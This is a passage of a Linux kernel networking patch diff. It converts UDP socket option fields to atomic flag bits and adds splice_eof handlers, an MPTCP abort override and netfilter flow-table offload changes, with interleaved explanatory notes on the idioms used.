+-			     page, offset, size, flags);
+-	if (ret == -EOPNOTSUPP) {
+-		release_sock(sk);
+-		return sock_no_sendpage(sk->sk_socket, page, offset,
+-					size, flags);
+-	}
+-	if (ret < 0) {
+-		udp_flush_pending_frames(sk);
+-		goto out;
+-	}
++	if (flags & MSG_SENDPAGE_NOTLAST)
++		msg.msg_flags |= MSG_MORE;
+ 
+-	up->len += size;
+-	if (!(READ_ONCE(up->corkflag) || (flags&MSG_MORE)))
+-		ret = udp_push_pending_frames(sk);
+-	if (!ret)
+-		ret = size;
+-out:
+-	release_sock(sk);
+-	return ret;
++	bvec_set_page(&bvec, page, size, offset);
++	iov_iter_bvec(&msg.msg_iter, ITER_SOURCE, &bvec, 1, size);
++	return udp_sendmsg(sk, &msg, size);
+ }
+ 
+ #define UDP_SKB_IS_STATELESS 0x80000000
+@@ -1925,7 +1901,7 @@ try_again:
+ 						      (struct sockaddr *)sin);
+ 	}
+ 
+-	if (udp_sk(sk)->gro_enabled)
++	if (udp_test_bit(GRO_ENABLED, sk))
+ 		udp_cmsg_recv(msg, sk, skb);
+ 
+ 	if (inet->cmsg_flags)
+@@ -2138,7 +2114,8 @@ static int udp_queue_rcv_one_skb(struct sock *sk, struct sk_buff *skb)
+ 	}
+ 	nf_reset_ct(skb);
+ 
+-	if (static_branch_unlikely(&udp_encap_needed_key) && up->encap_type) {
++	if (static_branch_unlikely(&udp_encap_needed_key) &&
++	    READ_ONCE(up->encap_type)) {
+ 		int (*encap_rcv)(struct sock *sk, struct sk_buff *skb);
+ 
+ 		/*
+@@ -2669,7 +2646,7 @@ void udp_destroy_sock(struct sock *sk)
+ 			if (encap_destroy)
+ 				encap_destroy(sk);
+ 		}
+-		if (up->encap_enabled)
++		if (udp_test_bit(ENCAP_ENABLED, sk))
+ 			static_branch_dec(&udp_encap_needed_key);
+ 	}
+ }
+@@ -2697,9 +2674,9 @@ int udp_lib_setsockopt(struct sock *sk, int level, int optname,
+ 	switch (optname) {
+ 	case UDP_CORK:
+ 		if (val != 0) {
+-			WRITE_ONCE(up->corkflag, 1);
++			udp_set_bit(CORK, sk);
+ 		} else {
+-			WRITE_ONCE(up->corkflag, 0);
++			udp_clear_bit(CORK, sk);
+ 			lock_sock(sk);
+ 			push_pending_frames(sk);
+ 			release_sock(sk);
+@@ -2723,10 +2700,8 @@ int udp_lib_setsockopt(struct sock *sk, int level, int optname,
+ #endif
+ 			fallthrough;
+ 		case UDP_ENCAP_L2TPINUDP:
+-			up->encap_type = val;
+-			lock_sock(sk);
+-			udp_tunnel_encap_enable(sk->sk_socket);
+-			release_sock(sk);
++			WRITE_ONCE(up->encap_type, val);
++			udp_tunnel_encap_enable(sk);
+ 			break;
+ 		default:
+ 			err = -ENOPROTOOPT;
+@@ -2735,11 +2710,11 @@ int udp_lib_setsockopt(struct sock *sk, int level, int optname,
+ 		break;
+ 
+ 	case UDP_NO_CHECK6_TX:
+-		up->no_check6_tx = valbool;
++		udp_set_no_check6_tx(sk, valbool);
+ 		break;
+ 
+ 	case UDP_NO_CHECK6_RX:
+-		up->no_check6_rx = valbool;
++		udp_set_no_check6_rx(sk, valbool);
+ 		break;
+ 
+ 	case UDP_SEGMENT:
+@@ -2749,14 +2724,12 @@ int udp_lib_setsockopt(struct sock *sk, int level, int optname,
+ 		break;
+ 
+ 	case UDP_GRO:
+-		lock_sock(sk);
+ 
+ 		/* when enabling GRO, accept the related GSO packet type */
+ 		if (valbool)
+-			udp_tunnel_encap_enable(sk->sk_socket);
+-		up->gro_enabled = valbool;
+-		up->accept_udp_l4 = valbool;
+-		release_sock(sk);
++			udp_tunnel_encap_enable(sk);
++		udp_assign_bit(GRO_ENABLED, sk, valbool);
++		udp_assign_bit(ACCEPT_L4, sk, valbool);
+ 		break;
+ 
+ 	/*
+@@ -2824,19 +2797,19 @@ int udp_lib_getsockopt(struct sock *sk, int level, int optname,
+ 
+ 	switch (optname) {
+ 	case UDP_CORK:
+-		val = READ_ONCE(up->corkflag);
++		val = udp_test_bit(CORK, sk);
+ 		break;
+ 
+ 	case UDP_ENCAP:
+-		val = up->encap_type;
++		val = READ_ONCE(up->encap_type);
+ 		break;
+ 
+ 	case UDP_NO_CHECK6_TX:
+-		val = up->no_check6_tx;
++		val = udp_get_no_check6_tx(sk);
+ 		break;
+ 
+ 	case UDP_NO_CHECK6_RX:
+-		val = up->no_check6_rx;
++		val = udp_get_no_check6_rx(sk);
+ 		break;
+ 
+ 	case UDP_SEGMENT:
+@@ -2844,7 +2817,7 @@ int udp_lib_getsockopt(struct sock *sk, int level, int optname,
+ 		break;
+ 
+ 	case UDP_GRO:
+-		val = up->gro_enabled;
++		val = udp_test_bit(GRO_ENABLED, sk);
+ 		break;
+ 
+ 	/* The following two cannot be changed on UDP sockets, the return is
+@@ -2946,6 +2919,7 @@ struct proto udp_prot = {
+ 	.getsockopt		= udp_getsockopt,
+ 	.sendmsg		= udp_sendmsg,
+ 	.recvmsg		= udp_recvmsg,
++	.splice_eof		= udp_splice_eof,
+ 	.sendpage		= udp_sendpage,
+ 	.release_cb		= ip4_datagram_release_cb,
+ 	.hash			= udp_lib_hash,
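+
+For readers tracking the conversion in the hunks above: the udp_test_bit()/
+udp_set_bit()/udp_clear_bit()/udp_assign_bit() helpers replace per-field
+bitfields such as up->corkflag and up->gro_enabled with atomic bit operations
+on a single flags word, which is why the lock_sock()/release_sock() pairs can
+be dropped from the setsockopt paths. The helpers themselves are defined in
+include/linux/udp.h, outside this excerpt; a sketch of their likely shape,
+for orientation only (not the verbatim kernel definitions):
+
+    /* one bit per UDP socket option, all in udp_sk(sk)->udp_flags */
+    enum {
+            UDP_FLAGS_CORK,          /* socket is corked               */
+            UDP_FLAGS_NO_CHECK6_TX,  /* send zero IPv6 UDP checksums   */
+            UDP_FLAGS_NO_CHECK6_RX,  /* accept zero IPv6 UDP checksums */
+            UDP_FLAGS_GRO_ENABLED,   /* UDP GRO requested              */
+            UDP_FLAGS_ACCEPT_L4,     /* accept GSO-by-segment packets  */
+            UDP_FLAGS_ENCAP_ENABLED, /* tunnel encapsulation enabled   */
+    };
+
+    #define udp_test_bit(nr, sk) \
+            test_bit(UDP_FLAGS_##nr, &udp_sk(sk)->udp_flags)
+    #define udp_set_bit(nr, sk) \
+            set_bit(UDP_FLAGS_##nr, &udp_sk(sk)->udp_flags)
+    #define udp_clear_bit(nr, sk) \
+            clear_bit(UDP_FLAGS_##nr, &udp_sk(sk)->udp_flags)
+    #define udp_assign_bit(nr, sk, value) \
+            assign_bit(UDP_FLAGS_##nr, &udp_sk(sk)->udp_flags, value)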
+diff --git a/net/ipv4/udp_offload.c b/net/ipv4/udp_offload.c
+index 6d1a4bec2614d..8096576fd9bde 100644
+--- a/net/ipv4/udp_offload.c
++++ b/net/ipv4/udp_offload.c
+@@ -549,10 +549,10 @@ struct sk_buff *udp_gro_receive(struct list_head *head, struct sk_buff *skb,
+ 	NAPI_GRO_CB(skb)->is_flist = 0;
+ 	if (!sk || !udp_sk(sk)->gro_receive) {
+ 		if (skb->dev->features & NETIF_F_GRO_FRAGLIST)
+-			NAPI_GRO_CB(skb)->is_flist = sk ? !udp_sk(sk)->gro_enabled : 1;
++			NAPI_GRO_CB(skb)->is_flist = sk ? !udp_test_bit(GRO_ENABLED, sk) : 1;
+ 
+ 		if ((!sk && (skb->dev->features & NETIF_F_GRO_UDP_FWD)) ||
+-		    (sk && udp_sk(sk)->gro_enabled) || NAPI_GRO_CB(skb)->is_flist)
++		    (sk && udp_test_bit(GRO_ENABLED, sk)) || NAPI_GRO_CB(skb)->is_flist)
+ 			return call_gro_receive(udp_gro_receive_segment, head, skb);
+ 
+ 		/* no GRO, be sure flush the current packet */
+diff --git a/net/ipv4/udp_tunnel_core.c b/net/ipv4/udp_tunnel_core.c
+index 5f8104cf082d0..732e21b75ba28 100644
+--- a/net/ipv4/udp_tunnel_core.c
++++ b/net/ipv4/udp_tunnel_core.c
+@@ -78,7 +78,7 @@ void setup_udp_tunnel_sock(struct net *net, struct socket *sock,
+ 	udp_sk(sk)->gro_receive = cfg->gro_receive;
+ 	udp_sk(sk)->gro_complete = cfg->gro_complete;
+ 
+-	udp_tunnel_encap_enable(sock);
++	udp_tunnel_encap_enable(sk);
+ }
+ EXPORT_SYMBOL_GPL(setup_udp_tunnel_sock);
+ 
+diff --git a/net/ipv4/xfrm4_input.c b/net/ipv4/xfrm4_input.c
+index eac206a290d05..183f6dc372429 100644
+--- a/net/ipv4/xfrm4_input.c
++++ b/net/ipv4/xfrm4_input.c
+@@ -85,11 +85,11 @@ int xfrm4_udp_encap_rcv(struct sock *sk, struct sk_buff *skb)
+ 	struct udphdr *uh;
+ 	struct iphdr *iph;
+ 	int iphlen, len;
+-
+ 	__u8 *udpdata;
+ 	__be32 *udpdata32;
+-	__u16 encap_type = up->encap_type;
++	u16 encap_type;
+ 
++	encap_type = READ_ONCE(up->encap_type);
+ 	/* if this is not encapsulated socket, then just return now */
+ 	if (!encap_type)
+ 		return 1;
+diff --git a/net/ipv6/af_inet6.c b/net/ipv6/af_inet6.c
+index b5309ae87fd79..a2f29ca516000 100644
+--- a/net/ipv6/af_inet6.c
++++ b/net/ipv6/af_inet6.c
+@@ -711,6 +711,7 @@ const struct proto_ops inet6_stream_ops = {
+ #ifdef CONFIG_MMU
+ 	.mmap		   = tcp_mmap,
+ #endif
++	.splice_eof	   = inet_splice_eof,
+ 	.sendpage	   = inet_sendpage,
+ 	.sendmsg_locked    = tcp_sendmsg_locked,
+ 	.sendpage_locked   = tcp_sendpage_locked,
+diff --git a/net/ipv6/ip6_output.c b/net/ipv6/ip6_output.c
+index 3c2b2a85de367..e9ae084d038d1 100644
+--- a/net/ipv6/ip6_output.c
++++ b/net/ipv6/ip6_output.c
+@@ -1506,8 +1506,8 @@ static int __ip6_append_data(struct sock *sk,
+ 	mtu = cork->gso_size ? IP6_MAX_MTU : cork->fragsize;
+ 	orig_mtu = mtu;
+ 
+-	if (cork->tx_flags & SKBTX_ANY_SW_TSTAMP &&
+-	    sk->sk_tsflags & SOF_TIMESTAMPING_OPT_ID)
++	if (cork->tx_flags & SKBTX_ANY_TSTAMP &&
++	    READ_ONCE(sk->sk_tsflags) & SOF_TIMESTAMPING_OPT_ID)
+ 		tskey = atomic_inc_return(&sk->sk_tskey) - 1;
+ 
+ 	hh_len = LL_RESERVED_SPACE(rt->dst.dev);
+diff --git a/net/ipv6/ping.c b/net/ipv6/ping.c
+index 4d5a27dd9a4b2..a5d7d1915ba7e 100644
+--- a/net/ipv6/ping.c
++++ b/net/ipv6/ping.c
+@@ -119,7 +119,7 @@ static int ping_v6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 		return -EINVAL;
+ 
+ 	ipcm6_init_sk(&ipc6, np);
+-	ipc6.sockc.tsflags = sk->sk_tsflags;
++	ipc6.sockc.tsflags = READ_ONCE(sk->sk_tsflags);
+ 	ipc6.sockc.mark = READ_ONCE(sk->sk_mark);
+ 
+ 	fl6.flowi6_oif = oif;
+diff --git a/net/ipv6/raw.c b/net/ipv6/raw.c
+index df3abd9e5237c..dc31752a7edcc 100644
+--- a/net/ipv6/raw.c
++++ b/net/ipv6/raw.c
+@@ -776,7 +776,7 @@ static int rawv6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 	fl6.flowi6_uid = sk->sk_uid;
+ 
+ 	ipcm6_init(&ipc6);
+-	ipc6.sockc.tsflags = sk->sk_tsflags;
++	ipc6.sockc.tsflags = READ_ONCE(sk->sk_tsflags);
+ 	ipc6.sockc.mark = fl6.flowi6_mark;
+ 
+ 	if (sin6) {
+diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
+index 7be89dcfd5fc5..ba9a22db5805c 100644
+--- a/net/ipv6/tcp_ipv6.c
++++ b/net/ipv6/tcp_ipv6.c
+@@ -2158,6 +2158,7 @@ struct proto tcpv6_prot = {
+ 	.keepalive		= tcp_set_keepalive,
+ 	.recvmsg		= tcp_recvmsg,
+ 	.sendmsg		= tcp_sendmsg,
++	.splice_eof		= tcp_splice_eof,
+ 	.sendpage		= tcp_sendpage,
+ 	.backlog_rcv		= tcp_v6_do_rcv,
+ 	.release_cb		= tcp_release_cb,
+diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
+index 64b36c2ba774a..961106eda69d0 100644
+--- a/net/ipv6/udp.c
++++ b/net/ipv6/udp.c
+@@ -440,7 +440,7 @@ try_again:
+ 						      (struct sockaddr *)sin6);
+ 	}
+ 
+-	if (udp_sk(sk)->gro_enabled)
++	if (udp_test_bit(GRO_ENABLED, sk))
+ 		udp_cmsg_recv(msg, sk, skb);
+ 
+ 	if (np->rxopt.all)
+@@ -598,7 +598,7 @@ int __udp6_lib_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
+ 	sk = __udp6_lib_lookup(net, daddr, uh->dest, saddr, uh->source,
+ 			       inet6_iif(skb), inet6_sdif(skb), udptable, NULL);
+ 
+-	if (!sk || udp_sk(sk)->encap_type) {
++	if (!sk || READ_ONCE(udp_sk(sk)->encap_type)) {
+ 		/* No socket for error: try tunnels before discarding */
+ 		if (static_branch_unlikely(&udpv6_encap_needed_key)) {
+ 			sk = __udp6_lib_err_encap(net, hdr, offset, uh,
+@@ -712,7 +712,8 @@ static int udpv6_queue_rcv_one_skb(struct sock *sk, struct sk_buff *skb)
+ 	}
+ 	nf_reset_ct(skb);
+ 
+-	if (static_branch_unlikely(&udpv6_encap_needed_key) && up->encap_type) {
++	if (static_branch_unlikely(&udpv6_encap_needed_key) &&
++	    READ_ONCE(up->encap_type)) {
+ 		int (*encap_rcv)(struct sock *sk, struct sk_buff *skb);
+ 
+ 		/*
+@@ -882,7 +883,7 @@ start_lookup:
+ 		/* If zero checksum and no_check is not on for
+ 		 * the socket then skip it.
+ 		 */
+-		if (!uh->check && !udp_sk(sk)->no_check6_rx)
++		if (!uh->check && !udp_get_no_check6_rx(sk))
+ 			continue;
+ 		if (!first) {
+ 			first = sk;
+@@ -1000,7 +1001,7 @@ int __udp6_lib_rcv(struct sk_buff *skb, struct udp_table *udptable,
+ 		if (unlikely(rcu_dereference(sk->sk_rx_dst) != dst))
+ 			udp6_sk_rx_dst_set(sk, dst);
+ 
+-		if (!uh->check && !udp_sk(sk)->no_check6_rx) {
++		if (!uh->check && !udp_get_no_check6_rx(sk)) {
+ 			if (refcounted)
+ 				sock_put(sk);
+ 			goto report_csum_error;
+@@ -1022,7 +1023,7 @@ int __udp6_lib_rcv(struct sk_buff *skb, struct udp_table *udptable,
+ 	/* Unicast */
+ 	sk = __udp6_lib_lookup_skb(skb, uh->source, uh->dest, udptable);
+ 	if (sk) {
+-		if (!uh->check && !udp_sk(sk)->no_check6_rx)
++		if (!uh->check && !udp_get_no_check6_rx(sk))
+ 			goto report_csum_error;
+ 		return udp6_unicast_rcv_skb(sk, skb, uh);
+ 	}
+@@ -1260,7 +1261,7 @@ static int udp_v6_send_skb(struct sk_buff *skb, struct flowi6 *fl6,
+ 			kfree_skb(skb);
+ 			return -EINVAL;
+ 		}
+-		if (udp_sk(sk)->no_check6_tx) {
++		if (udp_get_no_check6_tx(sk)) {
+ 			kfree_skb(skb);
+ 			return -EINVAL;
+ 		}
+@@ -1281,7 +1282,7 @@ static int udp_v6_send_skb(struct sk_buff *skb, struct flowi6 *fl6,
+ 
+ 	if (is_udplite)
+ 		csum = udplite_csum(skb);
+-	else if (udp_sk(sk)->no_check6_tx) {   /* UDP csum disabled */
++	else if (udp_get_no_check6_tx(sk)) {   /* UDP csum disabled */
+ 		skb->ip_summed = CHECKSUM_NONE;
+ 		goto send;
+ 	} else if (skb->ip_summed == CHECKSUM_PARTIAL) { /* UDP hardware csum */
+@@ -1351,14 +1352,14 @@ int udpv6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 	int addr_len = msg->msg_namelen;
+ 	bool connected = false;
+ 	int ulen = len;
+-	int corkreq = READ_ONCE(up->corkflag) || msg->msg_flags&MSG_MORE;
++	int corkreq = udp_test_bit(CORK, sk) || msg->msg_flags & MSG_MORE;
+ 	int err;
+ 	int is_udplite = IS_UDPLITE(sk);
+ 	int (*getfrag)(void *, char *, int, int, int, struct sk_buff *);
+ 
+ 	ipcm6_init(&ipc6);
+ 	ipc6.gso_size = READ_ONCE(up->gso_size);
+-	ipc6.sockc.tsflags = sk->sk_tsflags;
++	ipc6.sockc.tsflags = READ_ONCE(sk->sk_tsflags);
+ 	ipc6.sockc.mark = READ_ONCE(sk->sk_mark);
+ 
+ 	/* destination address check */
+@@ -1657,6 +1658,20 @@ do_confirm:
+ 	goto out;
+ }
+ 
++static void udpv6_splice_eof(struct socket *sock)
++{
++	struct sock *sk = sock->sk;
++	struct udp_sock *up = udp_sk(sk);
++
++	if (!up->pending || udp_test_bit(CORK, sk))
++		return;
++
++	lock_sock(sk);
++	if (up->pending && !udp_test_bit(CORK, sk))
++		udp_v6_push_pending_frames(sk);
++	release_sock(sk);
++}
++
+ void udpv6_destroy_sock(struct sock *sk)
+ {
+ 	struct udp_sock *up = udp_sk(sk);
+@@ -1674,7 +1689,7 @@ void udpv6_destroy_sock(struct sock *sk)
+ 			if (encap_destroy)
+ 				encap_destroy(sk);
+ 		}
+-		if (up->encap_enabled) {
++		if (udp_test_bit(ENCAP_ENABLED, sk)) {
+ 			static_branch_dec(&udpv6_encap_needed_key);
+ 			udp_encap_disable();
+ 		}
+@@ -1768,6 +1783,7 @@ struct proto udpv6_prot = {
+ 	.getsockopt		= udpv6_getsockopt,
+ 	.sendmsg		= udpv6_sendmsg,
+ 	.recvmsg		= udpv6_recvmsg,
++	.splice_eof		= udpv6_splice_eof,
+ 	.release_cb		= ip6_datagram_release_cb,
+ 	.hash			= udp_lib_hash,
+ 	.unhash			= udp_lib_unhash,
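+
+udpv6_splice_eof() above (like udp_splice_eof() for IPv4 earlier in this
+patch) uses the classic check/lock/recheck idiom: test the condition
+locklessly so the common case skips the socket lock entirely, then re-test
+under the lock before acting, since the state may have changed in between.
+The bare pattern, with sk_has_pending() and sk_corked() as stand-ins for
+up->pending and the CORK bit (illustrative names, not real kernel helpers):
+
+    /* fast path: cheap unlocked test (the real code reads the fields
+     * with READ_ONCE() or an atomic test_bit)
+     */
+    if (!sk_has_pending(sk) || sk_corked(sk))
+            return;
+
+    lock_sock(sk);
+    if (sk_has_pending(sk) && !sk_corked(sk))
+            push_pending_frames(sk);    /* recheck under the lock */
+    release_sock(sk);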
+diff --git a/net/ipv6/xfrm6_input.c b/net/ipv6/xfrm6_input.c
+index 4907ab241d6be..4156387248e40 100644
+--- a/net/ipv6/xfrm6_input.c
++++ b/net/ipv6/xfrm6_input.c
+@@ -81,14 +81,14 @@ int xfrm6_udp_encap_rcv(struct sock *sk, struct sk_buff *skb)
+ 	struct ipv6hdr *ip6h;
+ 	int len;
+ 	int ip6hlen = sizeof(struct ipv6hdr);
+-
+ 	__u8 *udpdata;
+ 	__be32 *udpdata32;
+-	__u16 encap_type = up->encap_type;
++	u16 encap_type;
+ 
+ 	if (skb->protocol == htons(ETH_P_IP))
+ 		return xfrm4_udp_encap_rcv(sk, skb);
+ 
++	encap_type = READ_ONCE(up->encap_type);
+ 	/* if this is not encapsulated socket, then just return now */
+ 	if (!encap_type)
+ 		return 1;
+diff --git a/net/l2tp/l2tp_core.c b/net/l2tp/l2tp_core.c
+index 03608d3ded4b8..8d21ff25f1602 100644
+--- a/net/l2tp/l2tp_core.c
++++ b/net/l2tp/l2tp_core.c
+@@ -1139,9 +1139,9 @@ static void l2tp_tunnel_destruct(struct sock *sk)
+ 	switch (tunnel->encap) {
+ 	case L2TP_ENCAPTYPE_UDP:
+ 		/* No longer an encapsulation socket. See net/ipv4/udp.c */
+-		(udp_sk(sk))->encap_type = 0;
+-		(udp_sk(sk))->encap_rcv = NULL;
+-		(udp_sk(sk))->encap_destroy = NULL;
++		WRITE_ONCE(udp_sk(sk)->encap_type, 0);
++		udp_sk(sk)->encap_rcv = NULL;
++		udp_sk(sk)->encap_destroy = NULL;
+ 		break;
+ 	case L2TP_ENCAPTYPE_IP:
+ 		break;
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index d611783c2601f..8ed7769cae836 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -1899,6 +1899,17 @@ static void tcp_release_cb_override(struct sock *ssk)
+ 	tcp_release_cb(ssk);
+ }
+ 
++static int tcp_abort_override(struct sock *ssk, int err)
++{
++	/* closing a listener subflow requires a great deal of care.
++	 * keep it simple and just prevent such operation
++	 */
++	if (inet_sk_state_load(ssk) == TCP_LISTEN)
++		return -EINVAL;
++
++	return tcp_abort(ssk, err);
++}
++
+ static struct tcp_ulp_ops subflow_ulp_ops __read_mostly = {
+ 	.name		= "mptcp",
+ 	.owner		= THIS_MODULE,
+@@ -1942,6 +1953,7 @@ void __init mptcp_subflow_init(void)
+ 
+ 	tcp_prot_override = tcp_prot;
+ 	tcp_prot_override.release_cb = tcp_release_cb_override;
++	tcp_prot_override.diag_destroy = tcp_abort_override;
+ 
+ #if IS_ENABLED(CONFIG_MPTCP_IPV6)
+ 	/* In struct mptcp_subflow_request_sock, we assume the TCP request sock
+@@ -1977,6 +1989,7 @@ void __init mptcp_subflow_init(void)
+ 
+ 	tcpv6_prot_override = tcpv6_prot;
+ 	tcpv6_prot_override.release_cb = tcp_release_cb_override;
++	tcpv6_prot_override.diag_destroy = tcp_abort_override;
+ #endif
+ 
+ 	mptcp_diag_subflow_init(&subflow_ulp_ops);
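+
+tcp_abort_override() plugs into MPTCP's existing proto-override trick shown
+above: copy the entire struct proto, patch individual function pointers, and
+install the copy only on subflow sockets, leaving the shared tcp_prot
+untouched for plain TCP. The pattern in isolation (sketch, names invented):
+
+    static struct proto my_prot_override;
+
+    static int my_abort(struct sock *sk, int err)
+    {
+            if (inet_sk_state_load(sk) == TCP_LISTEN)
+                    return -EINVAL;    /* refuse to abort listeners */
+            return tcp_abort(sk, err);
+    }
+
+    /* at module init: */
+    my_prot_override = tcp_prot;              /* whole-struct copy */
+    my_prot_override.diag_destroy = my_abort; /* patch one hook    */
+    /* later, per selected socket: sk->sk_prot = &my_prot_override; */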
+diff --git a/net/netfilter/ipvs/ip_vs_xmit.c b/net/netfilter/ipvs/ip_vs_xmit.c
+index 7243079ef3546..b452eb3ddcecb 100644
+--- a/net/netfilter/ipvs/ip_vs_xmit.c
++++ b/net/netfilter/ipvs/ip_vs_xmit.c
+@@ -994,7 +994,7 @@ ip_vs_prepare_tunneled_skb(struct sk_buff *skb, int skb_af,
+ 		old_dsfield = ipv4_get_dsfield(old_iph);
+ 		*ttl = old_iph->ttl;
+ 		if (payload_len)
+-			*payload_len = ntohs(old_iph->tot_len);
++			*payload_len = skb_ip_totlen(skb);
+ 	}
+ 
+ 	/* Implement full-functionality option for ECN encapsulation */
+diff --git a/net/netfilter/nf_flow_table_core.c b/net/netfilter/nf_flow_table_core.c
+index 81c26a96c30bb..c1d99cb370b44 100644
+--- a/net/netfilter/nf_flow_table_core.c
++++ b/net/netfilter/nf_flow_table_core.c
+@@ -314,12 +314,12 @@ int flow_offload_add(struct nf_flowtable *flow_table, struct flow_offload *flow)
+ EXPORT_SYMBOL_GPL(flow_offload_add);
+ 
+ void flow_offload_refresh(struct nf_flowtable *flow_table,
+-			  struct flow_offload *flow)
++			  struct flow_offload *flow, bool force)
+ {
+ 	u32 timeout;
+ 
+ 	timeout = nf_flowtable_time_stamp + flow_offload_get_timeout(flow);
+-	if (timeout - READ_ONCE(flow->timeout) > HZ)
++	if (force || timeout - READ_ONCE(flow->timeout) > HZ)
+ 		WRITE_ONCE(flow->timeout, timeout);
+ 	else
+ 		return;
+@@ -416,11 +416,18 @@ nf_flow_table_iterate(struct nf_flowtable *flow_table,
+ 	return err;
+ }
+ 
++static bool nf_flow_custom_gc(struct nf_flowtable *flow_table,
++			      const struct flow_offload *flow)
++{
++	return flow_table->type->gc && flow_table->type->gc(flow);
++}
++
+ static void nf_flow_offload_gc_step(struct nf_flowtable *flow_table,
+ 				    struct flow_offload *flow, void *data)
+ {
+ 	if (nf_flow_has_expired(flow) ||
+-	    nf_ct_is_dying(flow->ct))
++	    nf_ct_is_dying(flow->ct) ||
++	    nf_flow_custom_gc(flow_table, flow))
+ 		flow_offload_teardown(flow);
+ 
+ 	if (test_bit(NF_FLOW_TEARDOWN, &flow->flags)) {
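+
+A side note on the refresh test above: both timeout values are u32 jiffies
+stamps, and the "timeout - READ_ONCE(flow->timeout) > HZ" form stays correct
+across a jiffies wraparound because unsigned subtraction is modulo 2^32. A
+tiny worked example with illustrative values:
+
+    u32 old = 0xfffffff0u;   /* stamped just before the wrap */
+    u32 now = old + 0x20;    /* 0x00000010 after wrapping    */
+
+    /* now < old numerically, yet now - old == 0x20, so an
+     * "elapsed > HZ" style comparison still gives the right answer.
+     */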
+diff --git a/net/netfilter/nf_flow_table_inet.c b/net/netfilter/nf_flow_table_inet.c
+index 0ccabf3fa6aa3..9505f9d188ff2 100644
+--- a/net/netfilter/nf_flow_table_inet.c
++++ b/net/netfilter/nf_flow_table_inet.c
+@@ -39,7 +39,7 @@ nf_flow_offload_inet_hook(void *priv, struct sk_buff *skb,
+ }
+ 
+ static int nf_flow_rule_route_inet(struct net *net,
+-				   const struct flow_offload *flow,
++				   struct flow_offload *flow,
+ 				   enum flow_offload_tuple_dir dir,
+ 				   struct nf_flow_rule *flow_rule)
+ {
+diff --git a/net/netfilter/nf_flow_table_ip.c b/net/netfilter/nf_flow_table_ip.c
+index b350fe9d00b0b..6feaac9ab05c8 100644
+--- a/net/netfilter/nf_flow_table_ip.c
++++ b/net/netfilter/nf_flow_table_ip.c
+@@ -384,7 +384,7 @@ nf_flow_offload_ip_hook(void *priv, struct sk_buff *skb,
+ 	if (skb_try_make_writable(skb, thoff + hdrsize))
+ 		return NF_DROP;
+ 
+-	flow_offload_refresh(flow_table, flow);
++	flow_offload_refresh(flow_table, flow, false);
+ 
+ 	nf_flow_encap_pop(skb, tuplehash);
+ 	thoff -= offset;
+@@ -646,7 +646,7 @@ nf_flow_offload_ipv6_hook(void *priv, struct sk_buff *skb,
+ 	if (skb_try_make_writable(skb, thoff + hdrsize))
+ 		return NF_DROP;
+ 
+-	flow_offload_refresh(flow_table, flow);
++	flow_offload_refresh(flow_table, flow, false);
+ 
+ 	nf_flow_encap_pop(skb, tuplehash);
+ 
+diff --git a/net/netfilter/nf_flow_table_offload.c b/net/netfilter/nf_flow_table_offload.c
+index 4d9b99abe37d6..1c26f03fc6617 100644
+--- a/net/netfilter/nf_flow_table_offload.c
++++ b/net/netfilter/nf_flow_table_offload.c
+@@ -679,7 +679,7 @@ nf_flow_rule_route_common(struct net *net, const struct flow_offload *flow,
+ 	return 0;
+ }
+ 
+-int nf_flow_rule_route_ipv4(struct net *net, const struct flow_offload *flow,
++int nf_flow_rule_route_ipv4(struct net *net, struct flow_offload *flow,
+ 			    enum flow_offload_tuple_dir dir,
+ 			    struct nf_flow_rule *flow_rule)
+ {
+@@ -704,7 +704,7 @@ int nf_flow_rule_route_ipv4(struct net *net, const struct flow_offload *flow,
+ }
+ EXPORT_SYMBOL_GPL(nf_flow_rule_route_ipv4);
+ 
+-int nf_flow_rule_route_ipv6(struct net *net, const struct flow_offload *flow,
++int nf_flow_rule_route_ipv6(struct net *net, struct flow_offload *flow,
+ 			    enum flow_offload_tuple_dir dir,
+ 			    struct nf_flow_rule *flow_rule)
+ {
+@@ -735,7 +735,7 @@ nf_flow_offload_rule_alloc(struct net *net,
+ {
+ 	const struct nf_flowtable *flowtable = offload->flowtable;
+ 	const struct flow_offload_tuple *tuple, *other_tuple;
+-	const struct flow_offload *flow = offload->flow;
++	struct flow_offload *flow = offload->flow;
+ 	struct dst_entry *other_dst = NULL;
+ 	struct nf_flow_rule *flow_rule;
+ 	int err = -ENOMEM;
+@@ -895,8 +895,9 @@ static int flow_offload_rule_add(struct flow_offload_work *offload,
+ 
+ 	ok_count += flow_offload_tuple_add(offload, flow_rule[0],
+ 					   FLOW_OFFLOAD_DIR_ORIGINAL);
+-	ok_count += flow_offload_tuple_add(offload, flow_rule[1],
+-					   FLOW_OFFLOAD_DIR_REPLY);
++	if (test_bit(NF_FLOW_HW_BIDIRECTIONAL, &offload->flow->flags))
++		ok_count += flow_offload_tuple_add(offload, flow_rule[1],
++						   FLOW_OFFLOAD_DIR_REPLY);
+ 	if (ok_count == 0)
+ 		return -ENOENT;
+ 
+@@ -926,7 +927,8 @@ static void flow_offload_work_del(struct flow_offload_work *offload)
+ {
+ 	clear_bit(IPS_HW_OFFLOAD_BIT, &offload->flow->ct->status);
+ 	flow_offload_tuple_del(offload, FLOW_OFFLOAD_DIR_ORIGINAL);
+-	flow_offload_tuple_del(offload, FLOW_OFFLOAD_DIR_REPLY);
++	if (test_bit(NF_FLOW_HW_BIDIRECTIONAL, &offload->flow->flags))
++		flow_offload_tuple_del(offload, FLOW_OFFLOAD_DIR_REPLY);
+ 	set_bit(NF_FLOW_HW_DEAD, &offload->flow->flags);
+ }
+ 
+@@ -946,7 +948,9 @@ static void flow_offload_work_stats(struct flow_offload_work *offload)
+ 	u64 lastused;
+ 
+ 	flow_offload_tuple_stats(offload, FLOW_OFFLOAD_DIR_ORIGINAL, &stats[0]);
+-	flow_offload_tuple_stats(offload, FLOW_OFFLOAD_DIR_REPLY, &stats[1]);
++	if (test_bit(NF_FLOW_HW_BIDIRECTIONAL, &offload->flow->flags))
++		flow_offload_tuple_stats(offload, FLOW_OFFLOAD_DIR_REPLY,
++					 &stats[1]);
+ 
+ 	lastused = max_t(u64, stats[0].lastused, stats[1].lastused);
